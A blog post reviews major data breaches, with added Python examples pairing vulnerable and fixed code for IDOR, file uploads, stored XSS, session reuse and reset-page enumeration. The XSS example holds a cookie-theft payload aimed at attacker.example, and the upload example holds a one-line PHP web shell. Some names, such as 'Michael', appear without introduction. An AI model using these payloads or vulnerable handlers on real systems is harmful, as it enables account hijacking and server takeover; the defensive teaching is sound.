Top Data Breaches (Part 1)

Posted by: adham saad

1-Ashley Madison – 2015

While the information leaked in the 2015 hack of Ashley Madison, a dating website for people seeking discreet extramarital affairs, had little financial value, its cultural footprint was very wide. More than 30 million email addresses and hundreds of credit card records were exposed in the attack.

The hack also set off months of marital disputes as spouses searched for their partner's email address in the leaked Ashley Madison database.

Debate raged online about the ethics of news outlets reporting on celebrities and politicians found in the company's files. There were also reports of criminals extorting people named in the data, demanding a ransom in exchange for keeping evidence of an affair quiet.

In 2017, the company settled a lawsuit filed by users for more than $11 million, but that did little to quell the social furor over the information and messages found on the website. The aftermath was said to have had life-altering consequences for some.

Police in Toronto attributed two suicides to information that came from the leak, and a pastor in New Orleans left a suicide note describing the fear and embarrassment he felt at being implicated in the Ashley Madison leak. The hack was one of the first to lead to real-world deaths.

2-Target – 2013

The 2013 attack on Target is one of the biggest to hit a major retailer. Attackers planted memory-scraping malware on the company's point-of-sale systems, capturing card data as it was processed at the checkout.

The breach highlighted a problem that would come to dominate the cybersecurity conversation for the rest of the decade: third-party partners. The attackers got into Target's network using credentials stolen from a heating, ventilation and air-conditioning contractor that worked for the company.

With that access, the criminals captured payment card details for more than 40 million Target customers. The company later admitted that the number was even larger: personal information such as names, addresses and email addresses for a further 70 million people had also been taken, bringing the total number of affected customers to as many as 110 million.

The attack had a devastating effect on Target: its CIO resigned months after the breach, and the company reported losses of more than $160 million as a result of it.

Security experts Divatia and Maor both said the hack was notable because it was the first of many major breaches involving third-party systems or companies.

3-First American Financial – 2019

The billion-dollar real estate title insurer First American Financial had one of the biggest leaks of 2019, exposing 885 million records dating back more than 15 years.

The exposure was reported by security journalist Brian Krebs, who wrote a lengthy post explaining how the insurer had exposed millions of mortgage-closing documents, including bank account numbers and statements, mortgage and tax records, Social Security numbers, wire transaction receipts and driver's license images.

He was tipped off by a real estate developer who discovered that anyone could read any of the company's documents, with no login required, simply by changing the document number in the URL: a textbook insecure direct object reference. Although it is unclear whether any of the information was accessed and misused, First American immediately took the site down.
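The URL-tampering flaw described above is an insecure direct object reference (IDOR). The following Python is an added example, not First American's code: a hypothetical document handler with sequential ids and constructed sample records, shown in its vulnerable form beside one that checks ownership on every lookup, plus the id-walking loop that turns the flaw into a mass download.

```python
# Added example (not First American's code): an insecure direct object
# reference and its fix.  The document store, ids and contents are constructed.

from typing import Optional

# Hypothetical document store keyed by a sequential id, as closing documents
# in a document-management system typically are.
DOCUMENTS = {
    1000: {"owner": "alice", "content": "Deed - 123 Main St"},
    1001: {"owner": "bob", "content": "Wire receipt - $450,000"},
    1002: {"owner": "carol", "content": "Tax record (constructed)"},
}


def get_document_vulnerable(doc_id: int) -> Optional[str]:
    """Serves whatever id appears in the URL.  The only 'protection' is that
    the id is hard to guess, and sequential ids are not."""
    doc = DOCUMENTS.get(doc_id)
    return doc["content"] if doc else None


def get_document_fixed(current_user: str, doc_id: int) -> Optional[str]:
    """Authorisation on every object access: the caller must own the record.
    Unknown and unauthorised ids both return None, so the response does not
    even confirm that an id exists."""
    doc = DOCUMENTS.get(doc_id)
    if doc is None or doc["owner"] != current_user:
        return None
    return doc["content"]


def enumerate_documents(fetch, start: int, count: int) -> list:
    """What the tipster effectively did: walk adjacent ids.  `fetch` is any
    callable that takes a document id and returns its content or None."""
    found = []
    for doc_id in range(start, start + count):
        content = fetch(doc_id)
        if content is not None:
            found.append((doc_id, content))
    return found


if __name__ == "__main__":
    # Anyone can walk the id space against the vulnerable handler...
    print(enumerate_documents(get_document_vulnerable, 1000, 3))
    # ...while against the fixed handler bob only ever sees his own record.
    print(enumerate_documents(lambda i: get_document_fixed("bob", i), 1000, 3))
```

The fix is the ownership check, not hiding the id: unguessable ids only slow enumeration down, and the check must run on every object-level request, not just the listing page.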

4-eBay – 2014

A 2014 cyber attack on eBay stole the login credentials of up to 145 million users. eBay admitted to the massive breach after its user database was compromised and urged all 145 million registered users to change their passwords. But were new passwords enough? The breach happened because of weaknesses in eBay's own infrastructure, not weak passwords, and within 36 hours of the disclosure three more critical vulnerabilities in eBay's website had been reported that could let an attacker compromise user accounts again, even for users who had already reset their password after the announcement.

HACKER UPLOADED SHELL ON eBAY SERVER (UNPATCHED)

A critical security flaw in an eBay website used by its employees could allow an attacker to upload a backdoor shell, according to security researcher Jordan Jones, who discovered the vulnerability.

Jones tweeted that he had already reported the flaw to eBay, along with a proof-of-concept screenshot showing that he had successfully uploaded a file named shell.php: a PHP script that lets an attacker run commands on the server, essentially a backdoor.
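An upload such as shell.php only becomes a backdoor when the server trusts the client's filename or Content-Type and writes the file somewhere the web server will execute it. The Python below is an added example, not eBay's code: an upload validator for an image endpoint that decides from the file's own bytes, never reuses the supplied name, and writes to a hypothetical directory outside the web root. The sample uploads are constructed.

```python
# Added example (not eBay's code): server-side validation for a file upload
# handler that is meant to accept images only.  Paths and samples are
# constructed for the example.

import os
import secrets

# Accepted types and the file signature ("magic bytes") each must start with.
# The client's Content-Type header is deliberately ignored: it is attacker-controlled.
ALLOWED_SIGNATURES = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}

# Hypothetical storage location, outside the web root, so a script that slips
# through is still never executed by the web server.
UPLOAD_DIR = "/var/app/uploads"


def validate_upload(filename: str, content: bytes) -> str:
    """Returns the extension the file will be stored under, or raises ValueError.

    Only the final extension counts ('shell.php.jpg' is treated as .jpg), and
    the bytes must carry the signature of that type, so 'shell.php',
    'shell.php.jpg' and a '.jpg' that is really PHP source all fail.
    """
    ext = os.path.splitext(filename)[1].lower().lstrip(".")
    if ext == "jpeg":
        ext = "jpg"
    if ext not in ALLOWED_SIGNATURES:          # also rejects '' (e.g. '.htaccess')
        raise ValueError(f"extension not allowed: {ext!r}")
    if not content.startswith(ALLOWED_SIGNATURES[ext]):
        raise ValueError("content does not match the claimed image type")
    # Defence in depth against image/PHP polyglots: a real image has no reason
    # to contain a PHP open tag.
    if b"<?php" in content:
        raise ValueError("embedded PHP marker")
    return ext


def is_rejected(filename: str, content: bytes) -> bool:
    """True if validate_upload would refuse this upload."""
    try:
        validate_upload(filename, content)
    except ValueError:
        return True
    return False


def store_upload(filename: str, content: bytes) -> str:
    """Validates the upload and returns the path it would be written to.  The
    stored name is random, so an attacker can neither choose nor predict it."""
    ext = validate_upload(filename, content)
    return os.path.join(UPLOAD_DIR, f"{secrets.token_hex(16)}.{ext}")


if __name__ == "__main__":
    php_shell = b"<?php system($_GET['c']); ?>"   # constructed payload
    for name, body in [("shell.php", php_shell), ("shell.php.jpg", php_shell),
                       ("photo.png", ALLOWED_SIGNATURES["png"] + b"\x00" * 8)]:
        print(name, "rejected" if is_rejected(name, body) else "accepted")
```

Even with these checks, the controlling mitigation is the last one: files that are never served from an executable location cannot become a shell, whatever they contain.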

PERSISTENT XSS VULNERABILITY ON eBAY (UNPATCHED)

A persistent (stored) cross-site scripting vulnerability was also found on eBay's auction pages. It allowed arbitrary HTML and JavaScript to be injected into the eBay website itself, where it was served to every visitor of the affected listing.

Each time a user visits a booby-trapped auction page created by the attacker, the injected JavaScript runs in that user's browser with eBay's origin. The payload reads the user's session cookies and sends them to the attacker, who can then use them to hijack the account.
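The following Python is an added example, not eBay's code, showing the two ends of the attack just described: a listing renderer that inserts seller-supplied text into the page unescaped beside one that escapes it, and a session cookie set with the HttpOnly flag so that even a successful injection cannot read it from document.cookie. The listing text, the attacker host and the cookie value are constructed.

```python
# Added example (not eBay's code): stored XSS in an auction description and
# the two controls that defeat the cookie-theft payload.  Listing text and
# the attacker's host are constructed for the example.

import html

# The attacker's listing description.  In the vulnerable page this script runs
# in every visitor's browser and ships document.cookie to the attacker's host.
MALICIOUS_DESCRIPTION = (
    "Great bike!<script>new Image().src="
    "'https://attacker.example/c?'+document.cookie</script>"
)


def render_listing_vulnerable(title: str, description: str) -> str:
    """Interpolates seller-supplied text straight into the page, so any tags
    and script inside `description` are interpreted by the browser."""
    return f"<h1>{title}</h1><div class='desc'>{description}</div>"


def render_listing_fixed(title: str, description: str) -> str:
    """Escapes every untrusted value at the point it enters HTML.  The text
    still displays as typed, but '<' becomes '&lt;' and no element is created."""
    return (
        f"<h1>{html.escape(title)}</h1>"
        f"<div class='desc'>{html.escape(description)}</div>"
    )


def session_cookie_header(token: str) -> str:
    """Set-Cookie header for the session.  HttpOnly keeps document.cookie from
    ever seeing the value, so a script that does run cannot exfiltrate it;
    Secure and SameSite restrict where the browser will send it."""
    return f"Set-Cookie: session={token}; Secure; HttpOnly; SameSite=Lax; Path=/"


def contains_script_tag(rendered: str) -> bool:
    """Crude check for the example: did a live <script> element survive rendering?"""
    return "<script>" in rendered.lower()


if __name__ == "__main__":
    print(render_listing_vulnerable("Bike", MALICIOUS_DESCRIPTION))
    print(render_listing_fixed("Bike", MALICIOUS_DESCRIPTION))
    print(session_cookie_header("constructed-token"))
```

Output escaping stops the injection; HttpOnly limits the damage if some other injection point is missed. Both belong in place, and neither helps if the server keeps honouring a cookie after the user has logged out.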

COOKIE RE-USE VULNERABILITY (UNPATCHED)

In a separate experiment, the journalists who covered these flaws found that eBay kept accepting the same login cookies again and again, even after the victim had logged out or reset their password.

That means that, by using Michael's persistent XSS vulnerability to steal eBay users' session cookies, an attacker could gain unauthorized access to those accounts without knowing either the old or the newly reset password.
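The cookie re-use problem is a session-management failure: a stolen token stays valid no matter what the victim does. The Python below is an added example, not eBay's code, of a session store that behaves correctly. Each token records the password "generation" it was issued under, so a password reset moves the generation forward and orphans every earlier token at once, and logout deletes the token server-side. Users and tokens are constructed in the usage block.

```python
# Added example (not eBay's code): server-side session store in which tokens
# stop working on logout and on password reset.  Accounts are constructed.

import secrets
from typing import Dict, Optional, Tuple


class SessionStore:
    def __init__(self) -> None:
        self._tokens: Dict[str, Tuple[str, int]] = {}  # token -> (user, generation)
        self._generation: Dict[str, int] = {}          # user -> current generation

    def login(self, username: str, password_ok: bool) -> Optional[str]:
        """Issues a fresh random token tied to the user's current password
        generation.  `password_ok` stands in for the real credential check."""
        if not password_ok:
            return None
        token = secrets.token_urlsafe(32)
        gen = self._generation.setdefault(username, 0)
        self._tokens[token] = (username, gen)
        return token

    def user_for(self, token: str) -> Optional[str]:
        """Resolves a cookie to a user.  The behaviour eBay was reported to
        have is simply this function without the generation comparison and
        without logout() ever removing anything."""
        entry = self._tokens.get(token)
        if entry is None:
            return None
        username, gen = entry
        if gen != self._generation.get(username):
            # Issued before a password reset: treat as logged out and forget it.
            del self._tokens[token]
            return None
        return username

    def logout(self, token: str) -> None:
        """Logout must invalidate on the server, not just clear the browser cookie."""
        self._tokens.pop(token, None)

    def reset_password(self, username: str) -> None:
        """Invalidates every session for the user, including ones stolen via
        XSS, by advancing the password generation."""
        self._generation[username] = self._generation.get(username, 0) + 1


if __name__ == "__main__":
    store = SessionStore()
    stolen = store.login("victim", True)        # token an XSS payload exfiltrated
    print(store.user_for(stolen))               # victim: attacker is in
    store.reset_password("victim")
    print(store.user_for(stolen))               # None: reset evicted the attacker
```

Storing a generation counter rather than enumerating and deleting tokens keeps the reset O(1) and also covers tokens the server has lost track of, such as ones cached on other nodes.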

ACCOUNT HIJACKING VULNERABILITY (CRITICAL AND UNPATCHED)

An Egyptian security researcher, Yasser H. Ali, informed The Hacker News of another critical vulnerability in the eBay website that could allow an attacker to hijack millions of user accounts in bulk, an exploit that would be very effective in targeted attacks. The technical details were withheld from readers because eBay's security team had not yet addressed the flaw, but Ali privately demonstrated it step by step to The Hacker News, which confirmed that it worked and promised to publish the details once eBay had patched it.

5-Facebook – 2019

Facebook has suffered more than one mass exposure of user data. Records on more than 540 million Facebook users sat on unprotected servers until April 2019. Then, in April 2021, a user in a low-level hacking forum published, for free, the phone numbers and personal data of hundreds of millions of Facebook users.

The exposed data includes the personal information of over 533 million Facebook users from 106 countries, including over 32 million records on users in the US, 11 million on users in the UK, and 6 million on users in India. The records contain phone numbers, Facebook IDs, full names, locations, birthdates, bios and, in some cases, email addresses.

Insider reviewed a sample of the leaked data and verified several records by matching known Facebook users' phone numbers with the IDs listed in the data set. It also verified records by entering email addresses from the data set into Facebook's password-reset feature, which partially reveals the phone number linked to an account.

A Facebook spokesperson told Insider that the data had been scraped by abusing a contact-import feature, through a vulnerability that the company patched in 2019.
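The verification trick described above, feeding an email address into a password-reset form to learn whether the account exists and see part of its phone number, works because the reset endpoint acts as an oracle. The Python below is an added example, not Facebook's code: a reset lookup that leaks in exactly that way, beside a version that returns the same message for every input, sends the phone number only out of band, and budgets attempts per source so the endpoint cannot be used to sweep a list. The accounts and phone numbers are constructed.

```python
# Added example (not Facebook's code): a password-reset endpoint as an account
# oracle, and a version that is not one.  All account data is constructed.

from collections import defaultdict
from typing import Dict, List, Tuple

ACCOUNTS: Dict[str, Dict[str, str]] = {      # constructed
    "alice@example.com": {"phone": "+15551234567"},
    "bob@example.com": {"phone": "+447700900123"},
}

GENERIC = "If an account exists for that address, we have sent reset instructions."


def reset_lookup_vulnerable(email: str) -> str:
    """Two leaks in one response: a different message for unknown addresses
    confirms which ones exist, and the masked number (length plus last four
    digits) is enough to match a record in a leaked data set."""
    acct = ACCOUNTS.get(email.lower())
    if acct is None:
        return "No account found for that email address."
    phone = acct["phone"]
    return f"We sent a code to {'*' * (len(phone) - 4)}{phone[-4:]}"


class ResetService:
    """Fixed variant: constant response regardless of whether the account
    exists, the phone number never appears in the response, and each source
    gets a small budget of lookups before being refused."""

    def __init__(self, max_attempts: int = 5) -> None:
        self.max_attempts = max_attempts
        self._attempts: Dict[str, int] = defaultdict(int)
        # Messages actually dispatched to users; internal, never returned.
        self.sent: List[Tuple[str, str]] = []

    def reset_lookup(self, source_ip: str, email: str) -> str:
        self._attempts[source_ip] += 1
        if self._attempts[source_ip] > self.max_attempts:
            return "Too many requests. Try again later."
        acct = ACCOUNTS.get(email.lower())
        if acct is not None:
            # The code goes to the user's own phone; the caller learns nothing.
            self.sent.append((email.lower(), acct["phone"]))
        return GENERIC


if __name__ == "__main__":
    print(reset_lookup_vulnerable("alice@example.com"))     # leaks existence + digits
    print(reset_lookup_vulnerable("nobody@example.com"))    # leaks non-existence
    svc = ResetService()
    print(svc.reset_lookup("203.0.113.9", "alice@example.com"))   # same text...
    print(svc.reset_lookup("203.0.113.9", "nobody@example.com"))  # ...either way
```

A per-IP budget is the simplest throttle and is easy to evade from many addresses, so a production service would also budget per target address and add friction such as a challenge; the point here is that the response text itself must not differ.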

Old data or not, the fact that the records appear to have been obtained by scraping Facebook profiles further complicates the company's relationship with privacy, even though it emerged relatively unscathed from the Cambridge Analytica scandal, in which the British consulting firm amassed the personal data of millions of Facebook users without their consent for the purposes of political advertising.
